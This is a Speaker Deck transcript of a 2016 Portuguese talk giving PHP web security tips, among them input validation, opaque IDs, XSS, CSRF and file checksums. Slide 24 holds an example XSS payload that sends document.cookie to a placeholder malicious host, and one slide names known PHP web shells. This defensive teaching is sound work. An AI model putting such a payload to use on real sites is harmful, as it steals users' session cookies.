Upgrade to Pro — share decks privately, control downloads, hide ads and more …

Dicas de segurança para o PHP e seus amigos

Joubert RedRat
November 18, 2016
Technology
0
25

Dicas de segurança para o PHP e seus amigos

Joubert RedRat

November 18, 2016
Tweet

More Decks by Joubert RedRat

See All by Joubert RedRat
Retome o controle do seu analytics com Matomo
joubertredrat
0
24
#tbt do PHP, a evolução da linguagem nos últimos 30 anos
joubertredrat
0
26
DevBox, o meu pequeno projeto open source para o dia a dia do dev
joubertredrat
0
25
O poder do Object Calisthenics no PHP
joubertredrat
0
95
Playing with Docker and Docker Compose
joubertredrat
0
120
Why migrate your application to microservices?
joubertredrat
0
16
Por que migrar sua aplicação para Microserviços?
joubertredrat
0
24
Uso prático de fakes para mocks no Golang
joubertredrat
0
79
Brincando com comandos no Golang
joubertredrat
0
160

Other Decks in Technology

See All in Technology
Git scrapingで始める継続的なデータ追跡 / Git Scraping
ohbarye
5
490
Goで実践するBFP
hiroyaterui
1
120
Alignment and Autonomy in Cybozu - 300人の開発組織でアラインメントと自律性を両立させるアジャイルな組織運営 / RSGT2025
ama_ch
1
2.4k
【JAWS-UG大阪 reInvent reCap LT大会 サンバが始まったら強制終了】“1分”で初めてのソロ参戦reInventを数字で振り返りながら反省する
ttelltte
0
140
ドメイン駆動設計の実践により事業の成長スピードと保守性を両立するショッピングクーポン
lycorptech_jp
PRO
12
2.1k
あなたの人生も変わるかも?AWS認定2つで始まったウソみたいな話
iwamot
3
850
生成AIのビジネス活用
seosoft
0
110
30分でわかる「リスクから学ぶKubernetesコンテナセキュリティ」/30min-k8s-container-sec
mochizuki875
3
450
AWS Community Builderのススメ - みんなもCommunity Builderに応募しよう! -
smt7174
0
180
AWS re:Invent 2024 recap in 20min / JAWSUG 千葉 2025.1.14
shimy
1
100
三菱電機で社内コミュニティを立ち上げた話
kurebayashi
1
360
.NET 最新アップデート ~ AI とクラウド時代のアプリモダナイゼーション
chack411
0
200

Featured

See All Featured
How GitHub (no longer) Works
holman
312
140k
Art, The Web, and Tiny UX
lynnandtonic
298
20k
Designing for humans not robots
tammielis
250
25k
Speed Design
sergeychernyshev
25
740
YesSQL, Process and Tooling at Scale
rocio
170
14k
Git: the NoSQL Database
bkeepers
PRO
427
64k
Practical Orchestrator
shlominoach
186
10k
Fireside Chat
paigeccino
34
3.1k
Fashionably flexible responsive web design (full day workshop)
malarkey
406
66k
Bash Introduction
62gerente
610
210k
10 Git Anti Patterns You Should be Aware of
lemiorhan
PRO
656
59k
Evolution of real-time – Irina Nazarova, EuRuKo, 2024
irinanazarova
6
500

Transcript

  1. Dicas de segurança para o PHP e seus amigos BHACK

    2016 – SEGURANÇA TI CONHECIMENTO

  2. Eu? Sou este ai https://github.com/joubertredrat https://br.linkedin.com/in/joubertredrat https://twitter.com/joubertredrat http://www.vivaolinux.com.br/~joubertredrat * no

    meu Linkedin explica o porque do apelido RedRat https://creativecommons.org/licenses/by-sa/4.0/ Dicas de segurança para o PHP e seus amigos

  3. Dicas de segurança para o PHP e seus amigos INFORMAÇÃO

    É PODER QUEM TEM INFORMAÇÃO DOMINA O MUNDO

  4. Dicas de segurança para o PHP e seus amigos 1ª

    DICA REMOVER INFORMAÇÕES DESNECESSÁRIAS

  5. Dicas de segurança para o PHP e seus amigos 1ª

    DICA - REMOVER INFORMAÇÕES DESNECESSÁRIAS

  6. Dicas de segurança para o PHP e seus amigos 1ª

    DICA - REMOVER INFORMAÇÕES DESNECESSÁRIAS

  7. Dicas de segurança para o PHP e seus amigos 2ª

    DICA ISOLAR SUAS APLICAÇÕES, SITES OU SISTEMAS

  8. Dicas de segurança para o PHP e seus amigos 2ª

    DICA - ISOLAR SUAS APLICAÇÕES, SITES OU SISTEMAS

  9. Dicas de segurança para o PHP e seus amigos 3ª

    DICA DESABILITAR OU EVITAR RECURSOS EXTERNOS

  10. Dicas de segurança para o PHP e seus amigos 3ª

    DICA - DESABILITAR OU EVITAR RECURSOS EXTERNOS R57 R6 C99Shell C100Shell bypass Tool25 b374k GaZa

  11. Dicas de segurança para o PHP e seus amigos 3ª

    DICA - DESABILITAR OU EVITAR RECURSOS EXTERNOS http://php.net/allow-url-include

  12. Dicas de segurança para o PHP e seus amigos 4ª

    DICA USAR URL AMIGÁVEIS E EVITAR QUERY STRING

  13. Dicas de segurança para o PHP e seus amigos 4ª

    DICA - USAR URL AMIGÁVEIS E EVITAR QUERY STRING

  14. Dicas de segurança para o PHP e seus amigos 5ª

    DICA TRATAR OS DADOS VINDOS DO USUÁRIO MESMO ASSIM QUER USAR QUERY STRING? 4ª DICA - USAR URL AMIGÁVEIS E EVITAR QUERY STRING

  15. Dicas de segurança para o PHP e seus amigos 5ª

    DICA - TRATAR OS DADOS VINDOS DO USUÁRIO filter_var mysqli_stmt_bind_param PDOStatement::bindValue DateTime::getLastErrors(); is_(bool,callable,numeric,float,string,object,etc) Libs no Packagist

  16. Dicas de segurança para o PHP e seus amigos 5ª

    DICA - TRATAR OS DADOS VINDOS DO USUÁRIO Quer fazer testes? sqlmap Zed Attack Proxy “ZAP” BeEF sqlninja

  17. Dicas de segurança para o PHP e seus amigos 6ª

    DICA EVITAR O USO DA PRIMARY KEY OU ID

  18. Dicas de segurança para o PHP e seus amigos 6ª

    DICA - EVITAR O USO DA PRIMARY KEY OU ID • UUID • GUID • MD5/CRC32/SHA1/SHA256 • Hash ou Ofuscamento

  19. Dicas de segurança para o PHP e seus amigos 6ª

    DICA - EVITAR O USO DA PRIMARY KEY OU ID

  20. Dicas de segurança para o PHP e seus amigos 7ª

    DICA (PRIMA DA 5ª DICA) CROSS-SITE SCRIPTING

  21. Dicas de segurança para o PHP e seus amigos 7ª

    DICA - CROSS-SITE SCRIPTING

  22. Dicas de segurança para o PHP e seus amigos 7ª

    DICA - CROSS-SITE SCRIPTING

  23. Dicas de segurança para o PHP e seus amigos 7ª

    DICA - CROSS-SITE SCRIPTING

  24. Dicas de segurança para o PHP e seus amigos 7ª

    DICA - CROSS-SITE SCRIPTING results.php?q=<script>window.open("http://site.do.mal/get.php?cookie=" + document.cookie, "_blank");</script>

  25. Dicas de segurança para o PHP e seus amigos 8ª

    DICA CROSS SITE REQUEST FORGERY

  26. Dicas de segurança para o PHP e seus amigos 8ª

    DICA - CROSS SITE REQUEST FORGERY

  27. Dicas de segurança para o PHP e seus amigos 9ª

    DICA USAR CHECKSUM OU O VCS AO SEU FAVOR

  28. Dicas de segurança para o PHP e seus amigos 9ª

    DICA - USAR CHECKSUM OU O VCS AO SEU FAVOR

  29. Dicas de segurança para o PHP e seus amigos ACABOU

    AS DICAS POR HOJE PERGUNTAS? FALA QUE NÃO TEM 